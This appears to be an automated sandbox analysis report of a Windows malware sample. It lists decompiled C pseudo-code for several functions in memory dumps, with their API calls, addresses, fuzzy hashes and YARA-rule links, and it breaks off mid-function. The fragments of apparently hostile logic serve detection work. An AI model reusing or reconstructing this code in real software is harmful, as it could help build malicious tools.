API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
String ID:
API String ID: 1449191863-0
Opcode ID: 0d2810efa375676ba294d0e4573a0cb430322feefff1771cdedc10fcd2c9a876
Instruction ID: 7d2011b212fb9fe99190789fb81ac53136444f0f1b362e217ae0fe450f87de5a
Opcode Fuzzy Hash: 0d2810efa375676ba294d0e4573a0cb430322feefff1771cdedc10fcd2c9a876
Instruction Fuzzy Hash: 64018F31141201ABDA306B60DC84F1BB7E6AF48764F120A35F591910E0DF20D81AEEAD

Uniqueness

Uniqueness Score: -1.00%

Function 02A73E69, Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02A73E69(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x2a7d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x2a7d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x2a7d258 = _t6;
					 *0x2a7d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x2a7d254 = _t7;
					if(_t7 == 0) {
						 *0x2a7d254 =  *0x2a7d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x02a73e71
0x02a73e77
0x02a73e7e
0x00000000
0x02a73ed8
0x02a73e80
0x02a73e88
0x02a73e95
0x02a73e95
0x02a73ed5
0x00000000
0x02a73ed5
0x02a73e97
0x02a73e97
0x02a73e9c
0x02a73eae
0x02a73eb3
0x02a73eb9
0x02a73ebf
0x02a73ec6
0x02a73ec8
0x02a73ec8
0x00000000
0x02a73ecf
0x02a73e91
0x00000000
0x00000000
0x02a73e93
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,02A7131F,?,?,00000001,?,?,?,02A74EF2,?), ref: 02A73E71
GetVersion.KERNEL32(?,00000001,?,?,?,02A74EF2,?), ref: 02A73E80
GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,02A74EF2,?), ref: 02A73E9C
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,02A74EF2,?), ref: 02A73EB9
GetLastError.KERNEL32(?,00000001,?,?,?,02A74EF2,?), ref: 02A73ED8

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 8b84b7583eac48bad139a922c7b2304d5a8a2570c8cea1b2673f393c3e912be6
Instruction ID: e7ed637e09e6f94e2a4dbd948d60c4208f533a0ba5f1e37685975011ed09cd39
Opcode Fuzzy Hash: 8b84b7583eac48bad139a922c7b2304d5a8a2570c8cea1b2673f393c3e912be6
Instruction Fuzzy Hash: 08F0A470EC07019BDB208F24AC19B197BA2AB90B11F110C66E503C61C0DF70C02BDF9D

Uniqueness

Uniqueness Score: -1.00%

Function 6DDFEB33, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 6DDFEB4A
_wcscmp.LIBCMT ref: 6DDFEB5B

Strings

OCP, xrefs: 6DDFEB55
ACP, xrefs: 6DDFEB44

Memory Dump Source

Source File: 00000003.00000002.500576744.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: _wcscmp
String ID: ACP$OCP
API String ID: 856254489-711371036
Opcode ID: 5fe1308f9aebf1fb0fe55e38a9af71023aba41052545ea96e8446d416fdbbc8e
Instruction ID: 816544797cc36cf95f56a1ccca3ebb8d92159a028f131086055575560826d2ba
Opcode Fuzzy Hash: 5fe1308f9aebf1fb0fe55e38a9af71023aba41052545ea96e8446d416fdbbc8e
Instruction Fuzzy Hash: 6B01B932649516F6EB11BB58DC41FEA37AC9F05769F068015FE09DB282FB30E64283E5

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE2860, Relevance: 6.3, APIs: 4, Instructions: 253COMMON

Download Yara Rule

APIs

char_traits.LIBCPMTD ref: 6DDE2897
char_traits.LIBCPMTD ref: 6DDE29F7
char_traits.LIBCPMTD ref: 6DDE2AE1
std::ios_base::width.LIBCPMTD ref: 6DDE2B11

Memory Dump Source

Source File: 00000003.00000002.500576744.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: char_traits$std::ios_base::width
String ID:
API String ID: 735177774-0
Opcode ID: 81d353eff2b1f1907416a45032abed1993d0fcf314a7e5e592fb211fcb4718aa
Instruction ID: b66da86c26f2f7ace4482409de7a3fb8b66d7ab1b411e79a6c8390a9a49b9f4b
Opcode Fuzzy Hash: 81d353eff2b1f1907416a45032abed1993d0fcf314a7e5e592fb211fcb4718aa
Instruction Fuzzy Hash: CEB1F974D04209EFDB28DF99C990BAEBBB2FF88348F108119E505AB355D731AE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE8000, Relevance: 6.2, APIs: 4, Instructions: 186COMMON

Download Yara Rule

APIs

std::ios_base::getloc.LIBCPMTD ref: 6DDE807C
_Mpunct.LIBCPMTD ref: 6DDE80D0

Memory Dump Source

Source File: 00000003.00000002.500576744.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: Mpunctstd::ios_base::getloc
String ID:
API String ID: 76177404-0
Opcode ID: d179762983805596437e6c2500111ddd50f6a711874581487a56ce70f321d0ec
Instruction ID: 663e63ec73c8477310e693d1b51a56543192db5a66e951537c59af6c76331e41
Opcode Fuzzy Hash: d179762983805596437e6c2500111ddd50f6a711874581487a56ce70f321d0ec
Instruction Fuzzy Hash: 4971FDB1D04118DFCB14EFA5D890AEEB7B5BF48354F11811DF619AB291DB30A945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02A76F3A, Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E02A76F3A(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x2a7d2a8; // 0x229a5a8
					_t5 = _t103 + 0x2a7e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x2a7c290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x2a7d2a8; // 0x229a5a8
												_t28 = _t109 + 0x2a7e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x2a7d2a8; // 0x229a5a8
														_t33 = _t79 + 0x2a7e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x02a76f3f
0x02a76f48
0x02a76f49
0x02a76f4d
0x02a76f53
0x02a76f59
0x02a76f62
0x02a76f68
0x02a76f72
0x02a76f74
0x02a76f7a
0x02a76f7f
0x02a76f8a
0x02a76f90
0x02a76f95
0x02a770b7
0x02a76f9b
0x02a76f9b
0x02a76fa8
0x02a76fae
0x02a76fb4
0x02a76fb8
0x02a76fbe
0x02a76fcb
0x02a76fcf
0x02a76fd5
0x02a76fd8
0x02a76fe0
0x02a76fe1
0x02a76fe5
0x02a76fe9
0x02a76fec
0x02a76fef
0x02a76ff5
0x02a76ffe
0x02a77004
0x02a77005
0x02a77008
0x02a77009
0x02a7700a
0x02a77012
0x02a77013
0x02a77014
0x02a77016
0x02a7701a
0x02a7701e
0x00000000
0x00000000
0x02a77024
0x02a7702d
0x02a77033
0x02a7703d
0x02a77041
0x02a77043
0x02a77050
0x02a77054
0x02a7705c
0x02a77061
0x02a77073
0x02a77075
0x02a7707b
0x02a7707b
0x02a77084
0x02a77084
0x02a77086
0x02a7708c
0x02a7708c
0x02a7708f
0x02a77095
0x02a77098
0x02a770a1
0x00000000
0x00000000
0x00000000
0x02a770a1
0x02a76ff5
0x02a76fef
0x02a76fd8
0x02a770a7
0x02a770a7
0x02a770ad
0x02a770ad
0x02a770b3
0x02a770b3
0x02a770bc
0x02a770c2
0x02a770c2
0x02a76f7f
0x02a770cb

APIs

SysAllocString.OLEAUT32(02A7C290), ref: 02A76F8A
lstrcmpW.KERNEL32(00000000,0076006F), ref: 02A7706B
SysFreeString.OLEAUT32(00000000), ref: 02A77084
SysFreeString.OLEAUT32(?), ref: 02A770B3

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 1d1c40631c3c5ea80a7f802077aafe087cc37b20d8ee2039671ffbb18c353e36
Instruction ID: 0e3e0a798808770da2f1c57ed2a1076a250a8c1a5ecc3e6d3fe9b16ac52574f8
Opcode Fuzzy Hash: 1d1c40631c3c5ea80a7f802077aafe087cc37b20d8ee2039671ffbb18c353e36
Instruction Fuzzy Hash: 75514D75D00509EFCB00DFA8CD88DAEF7BAEF88704B144599E905EB214DB319E42CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE9512, Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

__Getcvt.LIBCPMT ref: 6DDE956A
MultiByteToWideChar.KERNEL32(6DDE2D3A,00000009,?,00000002,00000000,00000000), ref: 6DDE95B8
MultiByteToWideChar.KERNEL32(6DDE2D3A,00000009,00000001,8BFC458B,00000000,00000000), ref: 6DDE962E
MultiByteToWideChar.KERNEL32(6DDE2D3A,00000009,00000001,00000001,00000000,00000000), ref: 6DDE9656

Memory Dump Source

Source File: 00000003.00000002.500576744.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: ByteCharMultiWide$Getcvt
String ID:
API String ID: 3195005509-0
Opcode ID: a9ca6453f2cf245866bd2b797be134d41e4d4216538f835cd32ed738df821bae
Instruction ID: 04d3f8bbd18eff02ef26646b974261f6777348ec947db35a4a1917349f69b785
Opcode Fuzzy Hash: a9ca6453f2cf245866bd2b797be134d41e4d4216538f835cd32ed738df821bae
Instruction Fuzzy Hash: F841E431A16346EFDB129F68D840BAB7BF9BF42390F118429F8619B181D771D854CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEEF8B, Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6DDEF021
__flush.LIBCMT ref: 6DDEF041
__write.LIBCMT ref: 6DDEF074
__flsbuf.LIBCMT ref: 6DDEF0A2

Part of subcall function 6DDEE791: __getptd_noexit.LIBCMT ref: 6DDEE791

Memory Dump Source

Source File: 00000003.00000002.500576744.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 68325089c4cc5d4c7e068de3ce2e56d884387ac5d5f90d0dd688e5e7e7a9a207
Instruction ID: 8e39d28700eb09bed86e6ebe4c8c4c35a396335770e94069950bc0e9f875cd29
Opcode Fuzzy Hash: 68325089c4cc5d4c7e068de3ce2e56d884387ac5d5f90d0dd688e5e7e7a9a207
Instruction Fuzzy Hash: A9411671704707DBEB08AFB9D890AAEB7B6EF853A0B10813DF454C7280D771D9458750

Uniqueness

Uniqueness Score: -1.00%

Function 02A753C6, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E02A753C6(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E02A71AD1(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E02A750FF(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E02A75745(_t101,  &_v236, _a8, _t96 - _t81);
					E02A75745(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E02A750FF(_t101, 0x2a7d1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E02A750FF(_a16, _a4);
						E02A75088(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L02A7AF2E();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L02A7AF28();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E02A75F21(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E02A790C2(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E02A76044(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x2a7d1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x02a753c9
0x02a753d5
0x02a753db
0x02a753e0
0x02a753e4
0x02a75541
0x02a75545
0x02a75545
0x02a753ea
0x02a753ee
0x02a753f2
0x02a753f5
0x02a75400
0x02a75406
0x02a7540b
0x02a7540e
0x02a75428
0x02a75434
0x02a7543d
0x02a75447
0x02a7544c
0x02a7544e
0x02a75451
0x02a754ff
0x02a75505
0x02a75516
0x02a75529
0x02a75539
0x00000000
0x02a7553e
0x02a7545a
0x02a75461
0x02a75465
0x02a7546b
0x02a7546d
0x02a7546f
0x02a75471
0x02a75473
0x02a7547d
0x02a75482
0x02a75484
0x02a75486
0x02a75487
0x02a75488
0x02a75489
0x02a75490
0x02a75497
0x02a7549a
0x02a7549a
0x02a75467
0x02a75467
0x02a75467
0x02a754a2
0x02a754aa
0x02a754b3
0x02a754b8
0x02a754b8
0x02a754bd
0x00000000
0x00000000
0x02a754bf
0x02a754c2
0x02a754cc
0x00000000
0x00000000
0x02a754ce
0x02a754ce
0x02a754d8
0x02a754b8
0x02a754bd
0x00000000
0x00000000
0x00000000
0x02a754bd
0x02a754e2
0x02a754e5
0x02a754e8
0x02a754ef
0x02a754ef
0x02a754fc
0x00000000
0x02a754fc
0x02a753f7
0x02a753fb
0x02a753fc
0x02a753fe
0x00000000
0x00000000
0x00000000
0x02a753fe
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 02A75473
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 02A75489
memset.NTDLL ref: 02A75529
memset.NTDLL ref: 02A75539

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 55c3f0718e4312de22179c5bf5a5dec2a7a4c7194d8e6e51be570d398534725b
Instruction ID: 321b1fa3d9e1157ef41230f1b077cc4371e2d79bbd748730d85bfd48bb26d163
Opcode Fuzzy Hash: 55c3f0718e4312de22179c5bf5a5dec2a7a4c7194d8e6e51be570d398534725b
Instruction Fuzzy Hash: B9418172A40209AFDB10DFA8CD80BDE7776EF44711F508529FD1AA7180DF7099598F98

Uniqueness

Uniqueness Score: -1.00%

Function 02A7A81C, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000008,75144D40), ref: 02A7A82E

Part of subcall function 02A7A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02A75595), ref: 02A7A72B

ResetEvent.KERNEL32(?), ref: 02A7A8A2
GetLastError.KERNEL32 ref: 02A7A8C5
GetLastError.KERNEL32 ref: 02A7A970

Part of subcall function 02A7A734: HeapFree.KERNEL32(00000000,00000000,02A75637,00000000,?,?,00000000), ref: 02A7A740

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
String ID:
API String ID: 943265810-0
Opcode ID: a5a872f2ba46b19993dc816ac13e65ade31bc114795300758a04ec43cd69cb7f
Instruction ID: 53ff15d65a4b6daa0e8c93d1e5c696abfeb4a0600838938fdb182f37097a1494
Opcode Fuzzy Hash: a5a872f2ba46b19993dc816ac13e65ade31bc114795300758a04ec43cd69cb7f
Instruction Fuzzy Hash: E2418E71940604BFDB219FA1CC88E5F7BBEEF89704F104929F542E1091EB31E55ACA68

Uniqueness

Uniqueness Score: -1.00%

Function 02A715FF, Relevance: 6.1, APIs: 4, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E02A715FF(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				void* _t30;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_push( &_v8);
					_push(4);
					_push( &_v20);
					_push( *((intOrPtr*)(_t69 + 0x18)));
					if( *0x2a7d134() != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x2a7d164(0, 1,  &_v12);
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E02A7A71F(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_push( &_v8);
										_push(0x1000);
										_push(_v16);
										_push( *((intOrPtr*)(_t69 + 0x18)));
										if( *0x2a7d134() != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E02A75646( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E02A7A734(_v16);
										if(_t64 == 0) {
											_t64 = E02A770CC(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E02A75646( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E02A79242(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}

0x02a715ff
0x02a71600
0x02a71606
0x02a71611
0x02a71611
0x02a71613
0x02a718e7
0x02a718ec
0x02a718ee
0x02a718f3
0x02a718f4
0x02a718f9
0x02a718fa
0x02a71905
0x02a71936
0x02a7193b
0x02a719fe
0x02a71941
0x02a71948
0x02a71950
0x02a719fb
0x02a71956
0x02a7195b
0x02a71960
0x02a71965
0x02a719ed
0x02a7196b
0x02a7196b
0x02a7196d
0x02a71973
0x02a71974
0x02a71974
0x02a71977
0x02a7197a
0x02a71980
0x02a71985
0x02a71986
0x02a7198b
0x02a7198e
0x02a71999
0x00000000
0x00000000
0x02a719a1
0x02a719a9
0x02a719b5
0x02a719b9
0x02a719bb
0x02a719c0
0x00000000
0x00000000
0x02a719c0
0x02a719b9
0x02a719d2
0x02a719d5
0x02a719dc
0x02a719e7
0x02a719e7
0x00000000
0x02a719c2
0x02a719c2
0x02a719c7
0x02a719c9
0x02a719ca
0x02a719cd
0x00000000
0x02a719cd
0x00000000
0x02a719c7
0x02a71974
0x02a719ee
0x02a719ee
0x02a719f4
0x02a719f4
0x02a71950
0x02a71907
0x02a7190d
0x02a71915
0x02a7192e
0x02a71930
0x00000000
0x00000000
0x02a71917
0x02a71921
0x02a71925
0x02a7192b
0x00000000
0x02a7192b
0x02a71925
0x02a71915
0x02a71a07
0x02a71608
0x02a71608
0x02a7160f
0x02a7161a
0x00000000
0x00000000
0x00000000
0x02a7160f

APIs

ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,751881D0), ref: 02A718EE
GetLastError.KERNEL32(?,?,?,00000000,751881D0), ref: 02A71907
ResetEvent.KERNEL32(?), ref: 02A71980
GetLastError.KERNEL32 ref: 02A7199B

Part of subcall function 02A79242: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 02A79259
Part of subcall function 02A79242: SetEvent.KERNEL32(?), ref: 02A79269

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$ErrorLastReset$ObjectSingleWait
String ID:
API String ID: 1123145548-0
Opcode ID: 6865c2649b0887addf80c1521987c8f40ad27d434dd6015930ac5b0e41009b5e
Instruction ID: 35f5d60d69b1afba4efba27d9fe71a358c91a2790816f76cfde17fb0e8a37d8f
Opcode Fuzzy Hash: 6865c2649b0887addf80c1521987c8f40ad27d434dd6015930ac5b0e41009b5e
Instruction Fuzzy Hash: EE410832A40604EFCB219BA5CC84FAEB7FAAF84360F100929E559D7150FF30E906CB58

Uniqueness

Uniqueness Score: -1.00%

Function 6DDF9842, Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6DDF9878
__isleadbyte_l.LIBCMT ref: 6DDF98A6
MultiByteToWideChar.KERNEL32(00000080,00000009,6DDF5423,00000001,00000000,00000000,?,00000000), ref: 6DDF98D4
MultiByteToWideChar.KERNEL32(00000080,00000009,6DDF5423,00000001,00000000,00000000,?,00000000), ref: 6DDF990A

Memory Dump Source

Source File: 00000003.00000002.500576744.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: a216e880e1291bea9c85eae21f1591e65de1059c2a50817309eb1d3f7d5b96dd
Instruction ID: fa94fde0c72c4d95d17463cff4d7016ecd8fb0cca7ec8db14e71b9521cb45794
Opcode Fuzzy Hash: a216e880e1291bea9c85eae21f1591e65de1059c2a50817309eb1d3f7d5b96dd
Instruction Fuzzy Hash: 3F319C31E04246EBDB12AF75C844BBE7BB9BF41314F138929F8648B191D731D852DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02A711EE, Relevance: 6.1, APIs: 4, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E02A711EE(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x2a7d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x2a7d2a8; // 0x229a5a8
				_t3 = _t8 + 0x2a7e87e; // 0x61636f4c
				_t25 = 0;
				_t30 = E02A738A8(_t3, 1);
				if(_t30 != 0) {
